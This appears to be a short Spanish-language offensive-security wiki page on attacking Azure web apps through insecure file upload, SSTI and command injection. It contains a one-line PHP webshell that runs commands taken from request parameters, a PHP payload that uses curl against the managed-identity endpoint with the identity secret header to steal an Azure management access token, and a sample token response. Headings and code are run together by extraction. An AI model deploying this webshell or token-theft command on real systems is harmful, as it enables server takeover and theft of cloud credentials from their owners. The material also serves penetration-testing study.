Ataques a aplicaciones web
Subida de ficheros insegura
IDENTITY_HEADER
IDENTITY_ENDPOINTcurl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADERWebshell de PHP
<?php
system($_REQUEST['cmd']);
?><?php
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>{"access_token":"<JWT>","expires_on":"05/17/2024 06:26:47 +00:00","resource":"https://management.azure.com/","token_type":"Bearer","client_id":"064aaf53-30af-41f0-841a-0e21ed149936"}Conexión y enumeración con token de acceso
SSTI - Server Side Template Injection
Obtención de variables de entorno de identidad administrada
Inyección de comandos
Última actualización